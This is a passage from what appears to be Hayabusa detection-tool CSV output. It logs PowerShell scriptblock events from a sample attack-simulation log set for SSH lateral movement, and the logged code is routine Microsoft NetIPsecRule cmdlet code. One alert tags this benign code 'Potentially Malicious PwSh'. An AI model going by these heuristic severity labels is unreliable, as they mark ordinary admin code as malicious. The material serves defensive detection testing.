[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 